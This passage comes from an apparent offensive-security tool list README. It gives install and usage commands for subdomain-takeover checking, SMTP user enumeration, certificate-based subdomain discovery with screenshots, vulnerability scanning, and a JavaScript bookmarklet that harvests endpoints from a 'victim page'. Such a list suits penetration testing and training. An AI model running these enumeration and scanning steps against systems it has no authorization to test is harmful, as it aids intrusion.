href="https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs"><img src="https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs" alt="reconftw" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.youtube.com/watch?v=TQmDAtkD1Wo" rel="nofollow">https://www.youtube.com/watch?v=TQmDAtkD1Wo</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/PentestPad/subzy">subzy</a></h3><a id="user-content-subzy" class="anchor" aria-label="Permalink: 🔙subzy" href="#subzy"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Subdomain takeover tool which works based on matching response fingerprints from <a href="https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md">can-i-take-over-xyz</a>.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install -v github.com/PentestPad/subzy@latest"><pre>go install -v github.com/PentestPad/subzy@latest</pre></div> <p dir="auto">For full installation instructions see <a href="https://github.com/PentestPad/subzy?tab=readme-ov-file#installation">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# List of subdomains ./subzy run --targets list.txt # Single or multiple targets ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com"><pre><span class="pl-c"><span class="pl-c">#</span> List of subdomains</span> ./subzy run --targets list.txt <span class="pl-c"><span class="pl-c">#</span> Single or multiple targets</span> ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA"><img src="https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA" alt="subzy" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/" rel="nofollow">https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/cytopia/smtp-user-enum">smtp-user-enum</a></h3><a id="user-content-smtp-user-enum" class="anchor" aria-label="Permalink: 🔙smtp-user-enum" href="#smtp-user-enum"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install smtp-user-enum"><pre>pip install smtp-user-enum</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version"><pre>smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4"><img src="https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4" alt="smtp-user-enum" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.kali.org/tools/smtp-user-enum/" rel="nofollow">https://www.kali.org/tools/smtp-user-enum/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>crt.sh -> httprobe -> EyeWitness</h3><a id="user-content-crtsh---httprobe---eyewitness" class="anchor" aria-label="Permalink: 🔙crt.sh -> httprobe -> EyeWitness" href="#crtsh---httprobe---eyewitness"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">I have put together a bash one-liner that:</p> <ul dir="auto"> <li>Passively collects a list of subdomains from certificate associations (<a href="https://crt.sh/" rel="nofollow">crt.sh</a>)</li> <li>Actively requests each subdomain to verify it's existence (<a href="https://github.com/tomnomnom/httprobe">httprobe</a>)</li> <li>Actively screenshots each subdomain for manual review (<a href="https://github.com/FortyNorthSecurity/EyeWitness">EyeWitness</a>)</li> </ul> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web"><pre>domain=DOMAIN_COM<span class="pl-k">;</span>rand=<span class="pl-smi">$RANDOM</span><span class="pl-k">;</span>curl -fsSL <span class="pl-s"><span class="pl-pds">"</span>https://crt.sh/?q=<span class="pl-smi">${domain}</span><span class="pl-pds">"</span></span> <span class="pl-k">|</span> pup <span class="pl-s"><span class="pl-pds">'</span>td text{}<span class="pl-pds">'</span></span> <span class="pl-k">|</span> grep <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">${domain}</span><span class="pl-pds">"</span></span> <span class="pl-k">|</span> sort -n <span class="pl-k">|</span> uniq <span class="pl-k">|</span> httprobe <span class="pl-k">></span> /tmp/enum_tmp_<span class="pl-smi">${rand}</span>.txt<span class="pl-k">;</span> python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_<span class="pl-smi">${rand}</span>.txt --web</pre></div> <p dir="auto"><em>Note: You must have <a href="https://github.com/tomnomnom/httprobe">httprobe</a>, <a href="https://github.com/EricChiang/pup">pup</a> and <a href="https://github.com/FortyNorthSecurity/EyeWitness">EyeWitness</a> installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains</em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png"><img src="https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png"><img src="https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://twitter.com/renniepak/status/1602620834463588352" rel="nofollow">jsendpoints</a></h3><a id="user-content-jsendpoints" class="anchor" aria-label="Permalink: 🔙jsendpoints" href="#jsendpoints"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A JavaScript bookmarklet for extracting all webpage endpoint links on a page.</p> <p dir="auto">Created by <a href="https://twitter.com/renniepak" rel="nofollow">@renniepak</a>, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.</p> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();"><pre>javascript:<span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">var</span> <span class="pl-s1">scripts</span><span class="pl-c1">=</span><span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-en">getElementsByTagName</span><span class="pl-kos">(</span><span class="pl-s">"script"</span><span class="pl-kos">)</span><span class="pl-kos">,</span><span class="pl-s1">regex</span><span class="pl-c1">=</span><span class="pl-pds"><span class="pl-c1">/</span><span class="pl-kos">(?<</span><span class="pl-c1">=</span><span class="pl-kos">(</span><span class="pl-cce">\"</span><span class="pl-c1">|</span><span class="pl-cce">\'</span><span class="pl-c1">|</span><span class="pl-cce">\`</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-cce">\/</span><span class="pl-kos">[</span><span class="pl-c1">a</span><span class="pl-c1">-</span><span class="pl-c1">z</span><span class="pl-c1">A</span><span class="pl-c1">-</span><span class="pl-c1">Z</span><span class="pl-c1">0</span><span class="pl-c1">-</span><span class="pl-c1">9</span><span class="pl-c1">_</span><span class="pl-c1">?</span><span class="pl-c1">&</span><span class="pl-c1">=</span><span class="pl-cce">\/</span><span class="pl-cce">\-</span><span class="pl-cce">\#</span><span class="pl-cce">\.</span><span class="pl-kos">]</span><span class="pl-c1">*</span><span class="pl-kos">(?</span><span class="pl-c1">=</span><span class="pl-kos">(</span><span class="pl-cce">\"</span><span class="pl-c1">|</span><span class="pl-cce">\'</span><span class="pl-c1">|</span><span class="pl-cce">\`</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-c1">/</span>g</span><span class="pl-kos">;</span><span class="pl-k">const</span> <span class="pl-s1">results</span><span class="pl-c1">=</span><span class="pl-k">new</span> <span class="pl-v">Set</span><span class="pl-kos">;</span><span class="pl-k">for</span><span class="pl-kos">(</span><span class="pl-k">var</span> <span class="pl-s1">i</span><span class="pl-c1">=</span><span class="pl-c1">0</span><span class="pl-kos">;</span><span class="pl-s1">i</span><span class="pl-c1"><</span><span class="pl-s1">scripts</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span><span class="pl-s1">i</span><span class="pl-c1">++</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">var</span> <span class="pl-s1">t</span><span class="pl-c1">=</span><span class="pl-s1">scripts</span><span class="pl-kos">[</span><span class="pl-s1">i</span><span class="pl-kos">]</span><span class="pl-kos">.</span><span class="pl-c1">src</span><span class="pl-kos">;</span><span class="pl-s">""</span><span class="pl-c1">!=</span><span class="pl-s1">t</span><span class="pl-c1">&&</span><span class="pl-en">fetch</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">then</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">return</span> <span class="pl-s1">t</span><span class="pl-kos">.</span><span class="pl-en">text</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">then</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">var</span> <span class="pl-s1">e</span><span class="pl-c1">=</span><span class="pl-s1">t</span><span class="pl-kos">.</span><span class="pl-en">matchAll</span><span class="pl-kos">(</span><span class="pl-s1">regex</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-k">for</span><span class="pl-kos">(</span><span class="pl-k">let</span> <span class="pl-s1">r</span> <span class="pl-k">of</span> <span class="pl-s1">e</span><span class="pl-kos">)</span><span class="pl-s1">results</span><span class="pl-kos">.</span><span class="pl-en">add</span><span class="pl-kos">(</span><span class="pl-s1">r</span><span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">catch</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-smi">console</span><span class="pl-kos">.</span><span class="pl-en">log</span><span class="pl-kos">(</span><span class="pl-s">"An error occurred: "</span><span class="pl-kos">,</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-k">var</span> <span class="pl-s1">pageContent</span><span class="pl-c1">=</span><span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-c1">documentElement</span><span class="pl-kos">.</span><span class="pl-c1">outerHTML</span><span class="pl-kos">,</span><span class="pl-s1">matches</span><span class="pl-c1">=</span><span class="pl-s1">pageContent</span><span class="pl-kos">.</span><span class="pl-en">matchAll</span><span class="pl-kos">(</span><span class="pl-s1">regex</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-k">for</span><span class="pl-kos">(</span><span class="pl-k">const</span> <span class="pl-s1">match</span> <span class="pl-k">of</span> <span class="pl-s1">matches</span><span class="pl-kos">)</span><span class="pl-s1">results</span><span class="pl-kos">.</span><span class="pl-en">add</span><span class="pl-kos">(</span><span class="pl-s1">match</span><span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-k">function</span> <span class="pl-en">writeResults</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-s1">results</span><span class="pl-kos">.</span><span class="pl-en">forEach</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-en">write</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-c1">+</span><span class="pl-s">"<br>"</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-en">setTimeout</span><span class="pl-kos">(</span><span class="pl-s1">writeResults</span><span class="pl-kos">,</span><span class="pl-c1">3e3</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span></pre></div> <p dir="auto"><strong>Usage (Bookmarklet)</strong></p> <p dir="auto">Create a bookmarklet...</p> <ul dir="auto"> <li><code>Right click your bookmark bar</code></li> <li><code>Click 'Add Page'</code></li> <li><code>Paste the above Javascript in the 'url' box</code></li> <li><code>Click 'Save'</code></li> </ul> <p dir="auto">...then visit the victim page in the browser and click the bookmarklet.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png"><img src="https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><strong>Usage (Console)</strong></p> <p dir="auto">Paste the above Javascript into the console window <code>F12</code> and press enter.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png"><img src="https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/projectdiscovery/nuclei">nuclei</a></h3><a id="user-content-nuclei" class="anchor" aria-label="Permalink: 🔙nuclei" href="#nuclei"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Fast vulnerability scanner that uses .yaml templates to search for specific issues.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest"><pre>go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="cat domains.txt | nuclei -t /PATH/nuclei-templates/"><pre>cat domains.txt <span class="pl-k">|</span> nuclei -t /PATH/nuclei-templates/</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png"><img src="https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/A-poc/certSniff">certSniff</a></h3><a id="user-content-certsniff" class="anchor" aria-label="Permalink: 🔙certSniff" href="#certsniff"><svg class="octicon octicon-link" 